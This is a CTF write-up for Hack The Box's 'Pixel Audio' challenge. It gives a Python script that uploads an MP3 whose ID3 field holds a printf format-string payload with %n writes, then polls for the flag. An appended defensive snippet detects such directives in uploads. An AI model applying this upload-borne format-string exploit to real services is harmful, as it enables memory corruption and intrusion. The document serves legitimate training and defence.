HackTheBox Pixel Audio Writeup

Explore the basics of cybersecurity in the Pixel Audio challenge on Hack The Box. This medium-level challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

import requests
import time
import sys

def get_base_url():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"

def upload_file(url, file_path):
    """ Uploads a file to the server. """
    with open(file_path, 'rb') as file:
        files = {'file': ('test.mp3', file, 'audio/mp3')}
        response = requests.post(url, files=files)
    return response.status_code

def check_for_flag(url):
    """ Requests the /play endpoint to retrieve and display the flag. """
    while True:
        response = requests.get(url)
        if 'HTB' in response.text:
            print("Flag found:", response.text.strip())
            break
        else:
            print("No flag yet, retrying...")
        time.sleep(1)

def main():
    base_url = get_base_url()
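    # File body: the "ID3" tag followed by printf-style directives
    # (%<width>c padding and positional %<n>$n count writes).
    payload = 'ID3%48879c%12$n%495c%13$n'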
    file_path = '/tmp/test.mp3'
    with open(file_path, 'wb') as f:
        f.write(payload.encode('utf-8'))
    print("Payload written to", file_path)
    upload_url = f'{base_url}/upload'
    play_url = f'{base_url}/play'
    print("Uploading payload...")
    if upload_file(upload_url, file_path) == 200:
        print("Payload uploaded successfully.")
        check_for_flag(play_url)
    else:
        print("Failed to upload payload.")

if __name__ == '__main__':
    main()

Summary

The Pixel Audio Challenge on Hack The Box is a medium-level challenge that introduces users to concepts like file manipulation, server communication, and exploiting vulnerabilities in file formats. In this challenge, participants reverse-engineer an audio parsing binary, craft a payload embedded in an MP3 file, and upload it to a server. The exploit manipulates the ID3 metadata to trigger a response from the server, ultimately revealing the flag. This challenge provides an excellent opportunity for those looking to gain hands-on experience with reversing, web vulnerabilities, and file-based exploitation techniques.
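To read the payload from the upload-handling side, the following added example (not part of the original post or the challenge's code) walks the printf-style directives in a file's leading bytes and reports every `%n` write with the character count it would store. The function names, the 256-byte header window, the `skip` parameter and the benign sample are assumptions made for illustration; the page does not show where the binary starts formatting, so the count is shown both from byte 0 and from just after the 3-byte `ID3` tag.

```python
import re

# printf directive: %[n$][flags][width][.precision][length]conversion
DIRECTIVE = re.compile(
    rb"%(?:(?P<pos>\d+)\$)?[-+ #0']*(?P<width>\d+)?(?:\.\d+)?"
    rb"(?P<length>hh|h|ll|l|j|z|t|L)?(?P<conv>[diouxXeEfgGaAcspn%])"
)

PAYLOAD = b"ID3%48879c%12$n%495c%13$n"             # file body used in the post
BENIGN = b"ID3\x03\x00\x00\x00\x00\x0fvTIT2"       # constructed ordinary tag header

def audit_format_bytes(data, skip=0):
    """Describe every %n directive found in data[skip:].

    Returns (argument_position, length_modifier, count) tuples, where count is
    the number of characters printf would have emitted before that %n. Only
    literal text, %% and %c have a predictable width, so count is None once
    any other conversion has been seen.
    """
    findings, count, pos = [], 0, skip
    for m in DIRECTIVE.finditer(data, skip):
        if count is not None:
            count += m.start() - pos               # literal bytes since last directive
        pos = m.end()
        conv = m.group("conv")
        if conv == b"n":
            arg = int(m.group("pos")) if m.group("pos") else None
            findings.append((arg, (m.group("length") or b"").decode(), count))
        elif count is None:
            continue
        elif conv == b"%":
            count += 1                             # "%%" prints one '%'
        elif conv == b"c":
            count += max(int(m.group("width") or 1), 1)
        else:
            count = None                           # width depends on the argument
    return findings

def is_suspicious_upload(data, window=256):
    """Heuristic: an audio header has no reason to contain a %n directive."""
    return bool(audit_format_bytes(data[:window]))

if __name__ == "__main__":
    for skip in (0, 3):
        for arg, length, count in audit_format_bytes(PAYLOAD, skip):
            print(f"skip={skip}: %{length}n via argument {arg} stores {count:#x}")
    print("benign flagged:", is_suspicious_upload(BENIGN))
```

A filter like this is only a triage aid for uploads; the durable fix on the parsing side is to never pass file-controlled bytes as the format argument of a printf-family call.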

This post is licensed under CC BY 4.0 by the author.